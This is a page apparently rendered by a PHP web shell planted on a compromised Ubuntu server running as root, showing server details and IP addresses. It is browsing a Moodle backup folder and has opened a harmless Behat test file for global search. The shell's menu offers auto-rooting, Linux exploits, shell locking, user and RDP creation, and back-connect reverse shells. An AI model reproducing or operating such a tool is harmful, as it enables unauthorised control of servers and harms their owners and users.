Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
search /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
behat_search.php
5.39
KB
-rw-rw-r--
search_by_user.feature
2.82
KB
-rw-rw-r--
search_query.feature
5.55
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search_by_user.feature
@core @core_search Feature: Select users when searching for user-created content In order to search for content by specific users As a user I need to be able to add users to the select list in the search form Background: Given the following config values are set as admin: | enableglobalsearch | 1 | | searchengine | solr | And the following "courses" exist: | shortname | fullname | | C1 | Frogs | | C2 | Zombies | And the following "activities" exist: | activity | name | intro | course | idnumber | | page | PageName1 | PageDesc1 | C1 | PAGE1 | And the following "users" exist: | username | firstname | lastname | | s1 | Anne | Other | | s2 | Anne | Additional | | t | Anne | Ditin | And the following "course enrolments" exist: | user | course | role | | s1 | C1 | student | | s2 | C2 | student | | t | C1 | teacher | @javascript Scenario: As administrator, search for users from home page Given I log in as "admin" And global search expects the query "frogs" and will return: | type | idnumber | | activity | PAGE1 | And I search for "frogs" using the header global search box And I expand all fieldsets And I set the field with xpath "//select[@id='id_userids']/../input[@type='text']" to "Anne" # Alphabetical surname order. Then "Anne Additional" "text" should appear before "Anne Ditin" "text" And "Anne Ditin" "text" should appear before "Anne Other" "text" @javascript Scenario: As administrator, search for users within course Given I log in as "admin" And I am on "Frogs" course homepage And global search expects the query "frogs" and will return: | type | idnumber | | activity | PAGE1 | And I search for "frogs" using the header global search box And I expand all fieldsets And I select "Course: Frogs" from the "Search within" singleselect And I set the field with xpath "//select[@id='id_userids']/../input[@type='text']" to "Anne" # Users in selected course appear first. And "Anne Additional" "text" should appear after "Anne Other" "text" @javascript Scenario: As student, cannot see users on other courses Given I log in as "s1" And I am on "Frogs" course homepage And global search expects the query "frogs" and will return: | type | idnumber | | activity | PAGE1 | And I search for "frogs" using the header global search box And I expand all fieldsets And I set the field with xpath "//select[@id='id_userids']/../input[@type='text']" to "A" Then "Anne Ditin" "text" should appear before "Anne Other" "text" And "Anne Additional" "text" should not exist
Close